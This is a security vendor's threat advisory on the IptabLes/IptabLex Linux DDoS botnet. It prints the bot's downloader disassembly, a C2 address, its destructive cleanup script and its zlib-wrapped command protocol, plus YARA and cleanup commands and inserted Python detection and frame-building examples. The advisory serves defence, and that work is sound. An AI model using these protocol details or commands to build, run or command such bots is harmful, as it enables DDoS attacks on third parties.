
PROLEXIC
Now part of Akamai

IptabLes/IptabLex DDoS Bots

TLP: GREEN

GSI ID: 1077


OVERVIEW

During Q2 2014, Akamai's Prolexic Security Engineering and Research Team (PLXsert) detected and
measured distributed denial of service (DDoS) campaigns driven by the execution of a binary that
produces significant payloads by executing Domain Name System (DNS) and SYN flood attacks. One
campaign peaked at 119 Gbps bandwidth and 110 Mpps in volume. It appears to originate from Asia.
Observed incidents in Asia and now other parts of the world suggest the binary connects back to two
hardcoded IP addresses in China. [1] The mass infestation seems to be driven by a large number of
Linux-based web servers being compromised, mainly by exploits of Apache Struts, Tomcat, and
Elasticsearch vulnerabilities.

INDICATORS OF IPTABLES/IPTABLEX INFECTION 

The principal indicator of this infection is the presence of a Linux ELF binary that creates a copy of itself 
and names it .IptabLes or .IptabLex. The leading period is intentional and is intended to help hide the 
file. This binary is crafted to infect popular Linux distributions such as Debian, Ubuntu, CentOS and Red 
Hat. 

Reports of the infection are shown in Figures 1, 2 and 3. 



[1] "MMD-0025-2014 - ITW Infection of ELF .IptabLex & .IptabLes China #DDoS Bots Malware." Malware Must Die!, 15 June 2014.
[Figure 1: screenshot of a Red Hat knowledge base article titled "IptabLes / IptabLex files and processes are running on our system", updated May 2014. Issue: "I found some IptabLes / IptabLex files in my filesystem's partition" and "My system suddenly started to suffer from slow network traffic." Environment: Red Hat Enterprise Linux.]

Figure 1: Red Hat publicly reported the compromise to its customers



[Figure 2: screenshot of a lowendtalk.com thread (lowendtalk.com/discussion/28795/vps-got-hacked-with-iptables-iptablex), Home > Help > "VPS got Hacked with IptabLes IptabLeX", posted in June by member Bella:]

    Hi. I have over 60 VPSs from various providers here all running the exact same setup, but for the past
    month my Weloveservers VPSs keep getting compromised and send out-going ddos attacks by using
    these 2 files inside /boot/

    /boot/IptabLes
    /boot/IptabLex

    There are no login logs or anything.

    It was a completely new CentOS 5 32bit install with only httpd (apache) hosting a web page.

    http://www.ebe]-computing.de/JSPWiki/Wiki.jsp?page=VServer Trojan
    http://askubuntu.com/questions/407457/help-my-server-has-been-hacked-iptables-and-iptablex-in-boot
    http://forum.synology.com/enu/viewtopic.php?f=19&t=85779

    I have turned off the VM for now instead of reinstalling it so we can possibly investigate it.

Figure 2: A victim of IptabLes infection posted reports of the hacks on a public forum
[Figure 3: screenshot of a Chinese-language blog post machine-translated into English. The legible parts list the files /boot/IptabLes and /boot/IptabLex and refer to entries under /etc/rc.d; the rest of the screenshot is not readable in this copy.]

Figure 3: A translated report of IptabLex / IptabLes

The infections occur mainly in Linux servers with vulnerable Apache Tomcat, Struts, or Elasticsearch
software. The binary is distinct from the exploits used to control the server. Attackers are breaking into
the servers using a known exploit [2][3], escalating privileges, dropping the binary into the compromised
server, and executing it.



Not all vulnerabilities lead to the entire compromise of a server. In order to escalate privileges, attackers
must be able to execute code on a targeted server. This is often accomplished via remote code
execution exploits or escalation through a series of exploits, such as the following:

• Apache Struts ClassLoader Manipulation Remote Code Execution [4]

• Apache Struts Developer Mode OGNL Execution [5]

• Apache Roller OGNL Injection [6]

• Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution [7]

• Apache Struts includeParams Remote Code Execution [8]

• Apache Struts ParametersInterceptor Remote Code Execution [9]

• Apache Tomcat Manager - Application Upload Authenticated Code Execution [10]

• Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE [11]

[2] "Apache » Tomcat: Security Vulnerabilities." Apache Tomcat: List of Security Vulnerabilities. MITRE Corporation.

[3] "Apache » Struts: Security Vulnerabilities." Apache Struts: List of Security Vulnerabilities. MITRE Corporation.

[4] Metasploit. "Apache Struts ClassLoader Manipulation Remote Code Execution." Exploit DB. Offensive Security, 5 Feb. 2014.

[5] Metasploit. "Apache Struts Developer Mode OGNL Execution." Exploit DB. Offensive Security, 5 Feb. 2014.



There are reports of other applications being exploited in addition to the ones mentioned; however,
Apache Struts and Tomcat seem to be the principal vector of entry. After the initial compromise
and privilege escalation, attackers proceed to drop and execute the binary. Downloader binaries or
scripts may be used to spread and infect compromised machines with the .IptabLes bot.



IPTABLES ELF BOT ANALYSIS 



PLXsert has analyzed the binary associated with .IptabLes infections. The IptabLes binary will only 
function properly under root privileges. In some cases, the bot will run two versions of itself: one with 
advanced features and one with standard capabilities of the original payload. The bot will set up 
persistence, propagate, and make remote connections back to its assigned Command-and-Control 
server (C2). 

Along with the infiltration of vulnerable web servers, the IptabLes bot is being used with toolkit 
components such as downloader agents. In such cases, the downloader downloads and executes the 
contents of remote files. Figure 4 shows the downloader retrieving a remote file named run.txt. 



[6] Metasploit. "Apache Roller OGNL Injection." Exploit DB. Offensive Security, 27 Nov. 2013.

[7] Metasploit. "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution." Exploit DB. Offensive Security, 27 Jul. 2013.

[8] Metasploit. "Apache Struts includeParams Remote Code Execution." Exploit DB. Offensive Security, 5 June 2013.

[9] Metasploit. "Apache Struts ParametersInterceptor Remote Code Execution." Exploit DB. Offensive Security, 22 Mar. 2013.

[10] Metasploit. "Apache Tomcat Manager - Application Upload Authenticated Code Execution." Exploit DB. Offensive Security, 5 Feb. 2014.

[11] Rgod. "Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE." Exploit DB. Offensive Security, 4 Oct. 2013.
[Figure 4: IDA disassembly of the downloader. The listing builds a URL by calling sprintf with the format string "%s%s" (aSS_0), an entry from the Remote_URL table and the string "/run.txt" (aRun_txt), passes the result to http_download, and tests the return value before branching to loc_8048C2B. The operand columns are not legible in this copy.]

Figure 4: Code snippet of a downloader downloading a remote run.txt file



The run.txt file, shown in Figure 5, contains a pipe-delimited set of strings that define the executable
name of the bot payload. In this case it will execute the downloaded payloads as .IptabLes or .IptabLex.

    run.txt:
    .IptabLes|
    .IptabLex|

Figure 5: The contents of the run.txt file

The remote executable to download and run is then called by an additional user-defined function
named ShellEexec(). Figure 6 shows a snippet of the downloader preparing a URL and then executing the
downloaded file called getsetup.rar.

    loc_8048BEA:                            ; "/getsetup.rar"
        push    offset aGetsetuprar
        mov     eax, [ebp+var_780C]
        push    dword ptr Remote_URL[eax*4]
        push    offset aSS_0                ; "%s%s"
        lea     eax, [ebp+var_7808]
        push    eax
        call    sprintf
        add     esp, 10h
        sub     esp, 8
        lea     eax, [ebp+var_7808]
        push    eax
        lea     eax, [ebp+var_2808]
        push    eax
        call    ShellEexec
        add     esp, 10h
        jmp     short loc_8048C38

Figure 6: This code snippet downloads a remote, renamed IptabLes payload
PAYLOAD INITIALIZATION

When the IptabLes bot is run, it will first ensure that it isn't already running, and if it is, it will run a
cleanup script located in memory to clean the system of prior infection(s). The original payload will be
removed from the system and the only artifacts remaining will be the renamed .IptabLes bots and their
startup scripts. Figure 7 shows a cleanup script.

    delallfile (embedded shell script, decoded from the binary's string data):

    #!/bin/sh
    if [ -z $1 ]; then
    ps -f -C .IptabLes | grep .IptabLes | awk '{print $3}' | xargs $0 2
    ps -f -C .IptabLes | grep .IptabLes | awk '{print $3}' | xargs $0 2
    ps -f -C .IptabLes | grep .IptabLes | awk '{print $2}' | xargs $0 2
    ps -f -C .IptabLes | grep .IptabLes | awk '{print $2}' | xargs $0 2
    ps -axu | grep .IptabLes | awk '{print $2}' | xargs kill -9
    ps -axu | grep .IptabLes | awk '{print $2}' | xargs kill -9
    ps -C .IptabLes | xargs kill -9
    ps -C .IptabLes | grep .IptabLes | xargs kill -9
    find / -name *ptabLes | xargs rm -f
    find / -name .IptabLes | xargs rm -f
    find / -name *ptabLes | xargs rm -f
    find / -name .IptabLes | xargs rm -f
    rm -f /boot/.stabip
    rm -f /boot/.IptabLes
    rm -f /etc/rc.d/init.d/IptabLes
    rm -f /boot/IptabLes
    rm -f /tmp/IptabLes
    rm -f /usr/IptabLes
    rm -f /usr/.IptabLes
    rm -f /etc/rc.d/rc4.d/*IptabLes
    rm -f /etc/rc.d/rc1.d/*IptabLes
    rm -f /etc/rc.d/rc2.d/*IptabLes
    rm -f /etc/rc.d/rc3.d/*IptabLes
    rm -f /etc/rc.d/rc0.d/*IptabLes
    rm -f /etc/rc.d/rc5.d/*IptabLes
    rm -f /etc/rc.d/rc6.d/*IptabLes
    rm -f /etc/init.d/IptabLes
    rm -f /etc/rc4.d/*IptabLes
    rm -f /etc/rc1.d/*IptabLes
    rm -f /etc/rc2.d/*IptabLes
    rm -f /etc/rc3.d/*IptabLes
    rm -f /etc/rc0.d/*IptabLes
    rm -f /etc/rc5.d/*IptabLes
    rm -f /etc/rc6.d/*IptabLes
    rm -rf "$0"
    else
    if [ -z $2 ]; then
        exit
        else
        if [ 1 -ne $2 ]; then
            kill -9 $2
            fi
            fi
            fi
    exit

Figure 7: Cleanup script executed by the binary to prevent multiple infections

Figure 8 shows a scenario where multiple versions of the bot are executed. In most cases where a web
server is not run as a root administrative account but privilege escalation is possible, the bot will execute
two versions of itself, one with advanced (pro) features. This version can be identified by the presence of
function names in the binary's string data.

      PID TTY          TIME CMD
     4243 ?        00:00:00 .IptabLex
     4272 tty7     00:00:06 Xorg
     4352 ?        00:00:00 lightdm
     4574 ?        00:00:00 .IptabLes
     4912 ?        00:00:00 kworker/1:2
     4937 ?        00:00:00 systemd-localed
     5387 ?        00:00:00 .IptabLex
     5442 ?        00:00:00 .IptabLes

Figure 8: Multiple instances of a malicious binary (IptabLes and IptabLex)

The main initialization of the .IptabLes bot starts with an attempt to establish a connection with two
hardcoded IP addresses. The bot then sends information about the memory and CPU of the victim's
machine using a function called sendLoginInfo. Below is a network capture of the initial packet sent to
identify the infected machine to an assigned C2. This signature is unique to the individual host/C2 pair.

    Internet Protocol Version 4, Src: 192.168.48.142 (192.168.48.142), Dst: 119.145.148.165
    Transmission Control Protocol, Src Port: 60617 (60617), Dst Port: customs (1001), Seq: 1
    Data (157 bytes)
        Data: 7701006
        [Length: 157]

[The hex dump of the 157-byte payload is not legible in this copy; its ASCII column shows the victim's CPU model string (an "Intel(R) Core" CPU at "2.80G").]

Figure 9: Packet capture of a binary communicating to IPs in the Chinese botnet infrastructure



Once a connection is established, the bot awaits commands from the C2. The commands range from 
basic system modifications to launching DDoS attacks. 
PAYLOAD ENTRENCHMENT AND PERSISTENCE

Most observed bots that were dropped onto compromised systems were not named IptabLes at the
time of the drop. Some names contain a random file name with a .hub extension or common file
extensions such as zip or rar. A post-infection indication is payloads named .IptabLes or .IptabLex
located in the /boot directory and drops of bash script files in the /etc directory. These script files run
the .IptabLes binary on reboot, and they are symbolic links to the original file located in /boot/IptabLes.
Figures 10 and 11 show files typically associated with an infection of .IptabLes on a system.



    root@ubuntu:~# find / -name *ptabLes
    /boot/IptabLes
    /boot/.IptabLes
    /usr/.IptabLes
    /etc/rc2.d/S55IptabLes
    /etc/rc4.d/S55IptabLes
    /etc/rc3.d/S55IptabLes
    /etc/rc5.d/S55IptabLes

Figure 10: Presence of binaries in an infected system indicates infection



    root@ubuntu:~# cat /boot/IptabLex
    #!/bin/sh
    /boot/.IptabLex
    exit 0

Figure 11: Contents of a startup script in the /boot directory indicates malware persistence
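A read-only scanner for the persistence artifacts in Figures 10 and 11, added here as an example rather than PLXsert's tooling: the file and directory names come from the figures, while scan_for_iptables(), build_constructed_tree() and the constructed test tree are mine.

```python
"""Report the IptabLes persistence artifacts of Figures 10 and 11 (added example).

It deletes nothing. It reports hidden .IptabLes/.IptabLex binaries, S??IptabLe*
links in rc?.d directories, and /boot wrapper scripts that launch the hidden
binary. The root argument lets the same scan run over a mounted disk image or
over the constructed test tree built by build_constructed_tree().
"""
import os
import re
import tempfile

HIDDEN_BINARY = re.compile(r"^\.IptabLe[sx]$")   # /boot/.IptabLes, /usr/.IptabLes
RC_LINK = re.compile(r"^S\d\dIptabLe[sx]$")      # /etc/rc3.d/S55IptabLes
RC_DIR = re.compile(r"^rc\d\.d$")
WRAPPER = re.compile(r"^IptabLe[sx]$")           # /boot/IptabLex startup script


def scan_for_iptables(root="/"):
    """Walk root and return sorted (kind, path) findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        for name in filenames:               # symlinks to files are listed here too
            path = os.path.join(dirpath, name)
            if HIDDEN_BINARY.match(name):
                findings.append(("hidden_binary", path))
            elif RC_DIR.match(os.path.basename(dirpath)) and RC_LINK.match(name):
                findings.append(("rc_link", path))
            elif rel_dir == "boot" and WRAPPER.match(name):
                if _launches_hidden_binary(path):
                    findings.append(("startup_script", path))
    return sorted(findings)


def _launches_hidden_binary(path):
    """True when a wrapper script references /boot/.IptabLes or /boot/.IptabLex."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(4096)
    except OSError:
        return False
    return re.search(rb"/boot/\.IptabLe[sx]", head) is not None


def build_constructed_tree():
    """Constructed fixture (not a real infection): a temp tree laid out like Figures 10/11."""
    root = tempfile.mkdtemp(prefix="iptables_demo_")
    for d in ("boot", "usr", "etc/rc3.d", "etc/rc5.d", "var/log"):
        os.makedirs(os.path.join(root, d))
    for hidden in ("boot/.IptabLes", "boot/.IptabLex", "usr/.IptabLes"):
        with open(os.path.join(root, hidden), "wb") as fh:
            fh.write(b"\x7fELF")             # only the ELF magic, not an executable
    for wrapper, target in (("boot/IptabLex", "/boot/.IptabLex"),
                            ("boot/IptabLes", "/boot/.IptabLes")):
        with open(os.path.join(root, wrapper), "w") as fh:
            fh.write(f"#!/bin/sh\n{target}\nexit 0\n")   # wrapper from Figure 11
    for rc in ("etc/rc3.d", "etc/rc5.d"):
        os.symlink("../../boot/IptabLes", os.path.join(root, rc, "S55IptabLes"))
    with open(os.path.join(root, "var/log/syslog"), "w") as fh:
        fh.write("benign file that must not be reported\n")
    return root
```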

The IptabLes ELF binaries include a function that indicates a self-updating feature. The function named 
updatesrv will connect to a remote host and attempt to download a file. It sends the remote host a 
randomly generated string as the file name, and then the remote host will send the file via an 
established TCP connection. After being decompressed, the remote file replaces the original file. 



In the lab environment, the malware attempted to contact two IP addresses located in Asia. The 
communication attempts to establish a TCP connection over port 1001 to the IPs. 

NETWORK CODE ANALYSIS 

The .IptabLes binaries were initially known to have infected victims in Asia. However, more recently
many infections have been observed on servers hosted in the U.S. and in other regions. [12][13]

The following is a brief analysis of the command protocol of the IptabLex threat.

[12] "Logging Server Compromised (IptabLes and IptabLex)." Information Security. Stack Exchange, 27 May 2014.

[13] "My Droplet Has Been Compromised and Is Sending an Outgoing Flood or DDoS. What Do I Do?" DigitalOcean, 25 May 2014.
IptabLes command protocol

Initial research statically reverse engineered the command structure that may have been used to
communicate with the malware. The malware uses a simple command structure with one byte to
identify the action and with subsequent data parsed by the associated functions. The authors of the bot
used the zlib compression algorithm in an attempt to obfuscate the DDoS commands.

The IptabLes bot waits for commands from a malicious actor's C2 server. The logic of this
communication begins in a thread function named MAINPTH where the function recv() is called. If a
buffer size of less than 261 bytes is received, it passes the packet buffer to the MyRead() function. Figure
12 shows code that receives and parses commands from command and control.



    .text:0804E722    call    recv
    .text:0804E727    test    eax, eax
    .text:0804E729    mov     edi, eax
    .text:0804E72B    jle     short loc_804E6B4
    .text:0804E72D    cmp     eax, 261
    .text:0804E732    mov     dword ptr ds:g_mainsrvinfo+20Ch, 0
    .text:0804E73C    ja      short loc_804E790
    .text:0804E73E    mov     [esp+4], eax
    .text:0804E742    mov     [esp], ebx
    .text:0804E745    call    MyRead            ; parse incoming commands
    .text:0804E74A    jmp     loc_804E6AC

Figure 12: Code that receives and parses commands from command and control

The MyRead() function contains the core functionality that parses the receiving packet data. Most
commands can be identified by a one-byte check and control passes to subsequent functions that
operate on the data from the commands. The malicious actors appear to have attempted to hide the
DDoS commands by applying a compression algorithm to them (zlib compression wrapper). Below is a
pseudo code version of the operation applied when an incoming DDoS command is received by the
malware. Take note of the check for a magic value of 0xABCDEF88 in order to continue processing the
receiving packet data.

    short len = *(short*)(buff + 4)
    if *(int*)buff == 0xABCDEF88
        if len == buffer_len - 6      (minus the header check and the packet length variable)
            call MyRevise(void* buffer, size_t buf_len)

Figure 13: Pseudo code of the operation applied to an incoming DDoS command by the malware

The MyRevise() function is then called and the compressed payload is passed as the buffer argument.
This function decompresses and processes the data in the buffer. The decompressed size of the buffer
must be exactly 112 bytes. Once that condition is satisfied, the data is passed to a function called
AddTask() that parses the decompressed data and calls the appropriate DNS or SYN flood thread. A
pseudo code demonstration is shown below.

    if ( a1 )
    {
        new_data = 0;
        new_len = 2048;
        if ( HbLDeCompress(a1 + 6, a2, &new_data, &new_len) || new_len != 112 )
        {
            v2 = new_data;
        }
        else
        {
            v2 = new_data;
            if ( *(_BYTE *)(new_data + 8) & 1 )
            {
                v3 = *(_DWORD *)(new_data + 0x50);
                v4 = *(_DWORD *)(new_data + 0x54);
                v5 = *(_DWORD *)(new_data + 0x58);
                v6 = *(_DWORD *)(new_data + 0x5C);
                v7 = AddTask(new_data);
                MySend(&v3, 20);
                v2 = new_data;
            }
        }
        free(v2);
    }

Figure 14: A pseudo code demonstration of the decompression and parsing of the DDoS commands

Some of the identified DDoS commands are listed in Figure 15.

    setlocalip:            0xC8 + "IP"           -> changes source IP
    setrandomip:           0xCC + "IP String"    -> generates a random IP
    updatepath/updatesrv:  0x33 + "new path"     -> download and update malware executable
    Delete a Task:         0x10 + "Task number"  -> removes a task (DDoS command tasks)
    Delete All Tasks:      0x20                  -> delete all currently pending tasks

Figure 15: Example DDoS commands called by the AddTask() function
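A decoder for the command framing in Figures 13 to 15, added here as an example rather than code from the advisory or from the bot; it assumes HbLDeCompress() consumes a standard zlib stream and that a non-compressed command is its Figure 15 code byte followed by its argument, and the function names and the constructed sample frame are mine.

```python
"""Classify captured IptabLes C2 buffers using the checks of Figures 13 to 15.

Added example, not the bot's code. It mirrors MAINPTH()'s size gate, the
0xABCDEF88 magic, the 16-bit length at offset 4, inflation into a 2048-byte
buffer, the 112-byte task body, the flag bit at body offset 8 and the four
dwords at 0x50..0x5C that the bot echoes back via MySend().
"""
import struct
import zlib

MAGIC = 0xABCDEF88        # *(int*)buff as compared on a little-endian x86 host
TASK_BODY_LEN = 112       # new_len must equal this after inflation
INFLATE_MAX = 2048        # new_len's initial value: the inflate buffer size
MYREAD_MAX = 261          # MAINPTH passes only buffers shorter than this

SIMPLE_COMMANDS = {       # Figure 15: one code byte followed by its argument
    0xC8: "setlocalip",
    0xCC: "setrandomip",
    0x33: "updatepath/updatesrv",
    0x10: "delete_task",
    0x20: "delete_all_tasks",
}


class FrameError(ValueError):
    """The bot would drop this buffer; a decoder should say why."""


def decode_frame(buf: bytes) -> dict:
    """Classify one received buffer the way MAINPTH()/MyRead() do."""
    if not buf or len(buf) >= MYREAD_MAX:
        raise FrameError("buffer length outside MyRead() range")
    if len(buf) >= 6 and struct.unpack_from("<I", buf, 0)[0] == MAGIC:
        return decode_task_frame(buf)
    name = SIMPLE_COMMANDS.get(buf[0])
    if name is None:
        raise FrameError(f"unknown command byte 0x{buf[0]:02x}")
    return {"kind": "command", "name": name, "argument": buf[1:]}


def decode_task_frame(buf: bytes) -> dict:
    """Apply the Figure 13/14 checks to a compressed DDoS task frame."""
    declared = struct.unpack_from("<H", buf, 4)[0]
    if declared != len(buf) - 6:          # header (4) + length field (2)
        raise FrameError("length field does not match payload size")
    inflater = zlib.decompressobj()
    try:
        body = inflater.decompress(buf[6:], INFLATE_MAX)
    except zlib.error as exc:
        raise FrameError(f"inflate failed: {exc}") from exc
    if inflater.unconsumed_tail or len(body) != TASK_BODY_LEN:
        raise FrameError(f"task body is not {TASK_BODY_LEN} bytes")
    wants_ack = bool(body[8] & 1)         # *(_BYTE *)(new_data + 8) & 1
    echoed = struct.unpack_from("<4I", body, 0x50)   # v3..v6 passed to MySend()
    return {"kind": "task", "wants_ack": wants_ack, "echoed": echoed, "body": body}


def constructed_task_frame(flag: int = 1, marker: int = 0x11223344) -> bytes:
    """Constructed test input: a 112-byte body wrapped as the bot expects."""
    body = bytearray(TASK_BODY_LEN)
    body[8] = flag
    struct.pack_into("<4I", body, 0x50, marker, marker + 1, marker + 2, marker + 3)
    payload = zlib.compress(bytes(body))
    return struct.pack("<IH", MAGIC, len(payload)) + payload
```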

These DDoS commands are called by the AddTask() function, as shown in Figure 16. Both of the threads 
parse the data passed to them and generate unique SYN and DNS payloads. 
[Figure 16: two side-by-side IDA listings from AddTask(). After "test al, 8" and "jnz loc_804C1E0", the block at loc_804C179 and the block at loc_804C1E0 each load a pointer into the task structure (lea eax, [edi+70h]), store it and edi as thread arguments on the stack, set dword ptr [esp] to offset SynFloodThread (loc_804C179) or offset DnsFloodThread (loc_804C1E0), and call HbCreateThread. The remaining operand columns are not legible in this copy.]

Figure 16: DNS and SYN flood thread functions called by the AddTask() function



The analysis conducted within the lab environment showed that the binary exhibits DDoS functionality. 
Two functions found inside the binary indicate SYN and DNS flood attack payloads. These DDoS attack 
payloads are initiated once an attacker sends the command to an infected victim machine. Payload 
functions are shown in Figure 17. 



    syn_packet
    stopatk
    SynFloodSendThread
    DnsFloodSendThread
    dnspacket
    ChangeDns
    DnsFloodBuildThread
    ChangeSyn
    SynFloodThread
    SynFloodBuildThread
    dmpacket
    DnsFloodThread

Figure 17: Payload functions within the binary

OBSERVED CAMPAIGN 

Below are attack signatures observed during a DDoS attack mitigated for one of our customers. The
main attack vector was the DNS flood. More recent campaigns have relied primarily on SYN floods.

SYN Flood

    10:41:03.933780 IP X.X.X.X.10535 > X.X.X.X.80: Flags [S], seq 5361560, win 6000, length 1024

DNS Flood

    15:37:30.794536 IP X.X.X.X.2679 > X.X.X.X.53: 17664+ A? XX.XX.XX. (33)

Figure 18: Attack signatures for a SYN flood and DNS flood used by malicious actors in this attack campaign
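Detection logic for the two signatures in Figure 18 run over constructed tcpdump lines, added as an example rather than PLXsert's tooling; the sample addresses are documentation ranges standing in for the redacted X.X.X.X hosts, and the DNS burst threshold is an assumed value.

```python
"""Flag the Figure 18 flood signatures in tcpdump text output (added example).

Two signals: a SYN segment that carries a data payload ("Flags [S] ... length
1024", whereas a normal SYN has length 0), and repeated A? queries to port 53
from one source. SAMPLE_LINES are constructed from the figure; DNS_BURST is an
assumed threshold, not a value from the advisory.
"""
import re
from collections import Counter

SYN_LINE = re.compile(
    r"IP (?P<src>[\w.]+)\.(?P<sport>\d+) > (?P<dst>[\w.]+)\.(?P<dport>\d+): "
    r"Flags \[S\], .*?length (?P<len>\d+)")
DNS_LINE = re.compile(
    r"IP (?P<src>[\w.]+)\.(?P<sport>\d+) > (?P<dst>[\w.]+)\.53: "
    r"\d+\+ A\? (?P<name>\S+) \((?P<len>\d+)\)")
DNS_BURST = 3   # assumed: queries from one source in the sample that count as a flood

SAMPLE_LINES = [  # constructed; 198.51.100.x / 192.0.2.x / 203.0.113.x replace X.X.X.X
    "10:41:03.933780 IP 198.51.100.7.10535 > 203.0.113.10.80: Flags [S], seq 5361560, win 6000, length 1024",
    "10:41:03.933901 IP 198.51.100.7.10536 > 203.0.113.10.80: Flags [S], seq 5361561, win 6000, length 1024",
    "10:41:04.120000 IP 192.0.2.44.51000 > 203.0.113.10.80: Flags [S], seq 99, win 29200, length 0",
    "15:37:30.794536 IP 198.51.100.9.2679 > 203.0.113.53.53: 17664+ A? victim.example. (33)",
    "15:37:30.794602 IP 198.51.100.9.2680 > 203.0.113.53.53: 17665+ A? victim.example. (33)",
    "15:37:30.794688 IP 198.51.100.9.2681 > 203.0.113.53.53: 17666+ A? victim.example. (33)",
    "15:37:31.000000 IP 192.0.2.44.40000 > 203.0.113.53.53: 4+ A? victim.example. (33)",
]


def classify_lines(lines):
    """Return SYN-with-payload hits and the sources whose A? query count reaches DNS_BURST."""
    syn_hits = []
    dns_counts = Counter()
    for line in lines:
        m = SYN_LINE.search(line)
        if m:
            if int(m["len"]) > 0:          # payload on a SYN is the flood's tell
                syn_hits.append((m["src"], m["dst"], int(m["dport"]), int(m["len"])))
            continue
        m = DNS_LINE.search(line)
        if m:
            dns_counts[m["src"]] += 1
    floods = {src: n for src, n in dns_counts.items() if n >= DNS_BURST}
    return {"syn_with_payload": syn_hits, "dns_flood_sources": floods}
```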
    Peak bits per second (bps)    Peak packets per second (pps)
    26.40 Gbps                    13.00 Mpps
    30.20 Gbps                     9.50 Mpps
    17.00 Gbps                    18.00 Mpps
    30.10 Gbps                     6.75 Mpps
    15.50 Gbps                    12.00 Mpps

Figure 19: Attack scale and distribution

MITIGATION 

Mitigating this DDoS threat involves patching and hardening the server, antivirus detection and rate
limiting. In addition, PLXsert has created a YARA rule and a bash command to detect and eliminate this
threat in Linux servers.

Patches and hardening of the server

To mitigate against possible infection from this binary it is necessary to first harden the exposed web
platform and services by applying patches and updates from the respective software vendors and
developers:

• Apache Struts 2 Documentation: Security Bulletins [14]

• Apache Tomcat vulnerabilities and fixes [15]

• Elasticsearch mitigation procedures [16]

In addition, there are also fundamental Linux server hardening procedures provided by SANS Institute (PDF) [17].

The binary (ELF) will only run on Linux based systems; however, attackers may be using other web
exploits. The binary and the exploits used to break in are not co-dependent.

[14] "Security Bulletins." Apache Struts.

[15] "Security 7." Apache Tomcat. The Apache Software Foundation.

[16] Van Der Bijl, Bouke. "Insecure Default in Elasticsearch Enables Remote Code Execution." Bouk.co, May 2014.

[17] Lori Homsher and Tim Evans. Linux Security Checklist. Security Consensus Operational Readiness Evaluation, SANS Institute.
Antivirus detection

Several antivirus companies including McAfee have detections for this DDoS payload (McAfee identifies
it as a generic Linux/DDosFlooder); however, the detection rate among antivirus companies is relatively
low overall for this threat. At the time of this advisory, VirusTotal reported only 23 out of 54 antivirus
engines detecting this threat, which is an improvement from May 2014 when the detection rate was 2
out of 54 for this binary.



Rate limiting 

Attackers will typically target a domain with these attacks, so a target web server will receive the SYN 
flood on port 80 or other port deemed critical for the server's operation. The DNS flood will typically 
flood a domain's DNS server with requests. Assuming the target infrastructure can support the high 
bandwidth observed by these attacks, rate limiting may be an option. 



Akamai's Generic Routing Encapsulation (GRE) solution allows routing of an entire subnet (/24 minimum)
for mitigation. The attack will be absorbed by Akamai's solutions, allowing legitimate users to continue
to use the site and its services.



YARA rule 

YARA is an open source tool designed to identify and classify malware threats. It is typically used as a
host-based detection mechanism and provides a strong PCRE engine to match identifying features of
threats at a binary level or more. PLXsert utilizes YARA rules to classify threats that persist across many
campaigns and over time. Figure 20 contains a YARA rule provided by PLXsert to identify the ELF
IptabLes payload identified in this advisory.



    rule IptablesELF
    {
        meta:
            author = "PLXSert"
            description = "Rule to detect ELF IpTable DDoS executable"

        strings:
            $elf = {7f 45 4c 46}
            $st0 = "SynFloodSendThread"
            $st1 = "DnsFloodSendThread"
            $st2 = "SynFloodBuildThread"
            $st3 = "DnsFloodBuildThread"
            $st4 = "MAINPTH"

            $code1 = "list.c"
            $code2 = "main.c"
            $code3 = "mypth.c"
            $code4 = "Service.c"
            $code5 = "srvnet.c"
            $code6 = "ckbuf"
            $code7 = "udptest.c"

        condition:
            ($elf at 0 and all of ($st*) and 5 of ($code*))
    }

Figure 20: YARA rule for bot identification and classification of IPTabLes/IPTabLex DDoS bots



Bash commands 

Two bash commands from PLXsert are designed to clean a system infected with the ELF IptabLes binary. 
After running these commands, system administrators are advised to reboot the system and run a 
thorough system inspection. 



    sudo find / -type f -name '.*ptabLe*' -exec rm -f {} ';'

    ps -axu | awk '/\.IptabLe/ {print $2}' | sudo xargs kill -9

Figure 21: Bash commands to clean a system infected with the ELF IptabLes binary

CONCLUSION 

To prevent further infestation and spread of this botnet it is necessary to identify and apply corrective 
measures, such as those shown in this threat advisory. Command and control centers are currently 
located in Asia and the botnet has been used mainly to attack gaming and gambling verticals. 



Malicious actors behind this botnet have produced significant DDoS attack campaigns, forcing target 
companies to seek expert DDoS protection. This bot seems to be in an early development stage and 
shows several signs of instability. More refined and stable versions could emerge in future attack 
campaigns. 



PLXsert anticipates further infestation and the expansion of this botnet. Future DDoS attack campaigns
may target other industry verticals and involve other regions. Further development will likely be driven
by opportunities for monetization or takeover of the botnet by different groups in the DDoS-for-hire market.



The rise in infection by the .IptabLes bot creates a risk for servers that run potentially vulnerable services
such as Apache Struts and Tomcat. Misconfigured Elasticsearch instances have also been targeted in the
attacks, resulting in the widespread abuse of this new threat. Akamai (Prolexic), however, offers
mitigation solutions for these types of volumetric and amplification attacks that are exhibited by
.IptabLes bots.



PLXsert will continue observing this botnet and will produce further advisories if warranted. 
CONTRIBUTORS: PLXsert



ABOUT THE PROLEXIC SECURITY ENGINEERING AND RESEARCH TEAM (PLXsert) 

PLXsert monitors malicious cyber threats globally and analyzes these attacks using proprietary 
techniques and equipment. Through research, digital forensics and post-event analysis, PLXsert is able 
to build a global view of security threats, vulnerabilities and trends, which is shared with customers and 
the security community. By identifying the sources and associated attributes of individual attacks, along 
with best practices to identify and mitigate security threats and vulnerabilities, PLXsert helps 
organizations make more informed, proactive decisions. 



ABOUT AKAMAI 

Akamai® is the leading provider of cloud services for delivering, optimizing and securing online content 
and business applications. At the core of the Company's solutions is the Akamai Intelligent Platform™, 
providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai 
removes the complexities of connecting the increasingly mobile world, supporting 24/7 consumer 
demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is 
accelerating the pace of innovation in a hyperconnected world, please visit www.akamai.com or 
blogs.akamai.com, and follow @Akamai on Twitter.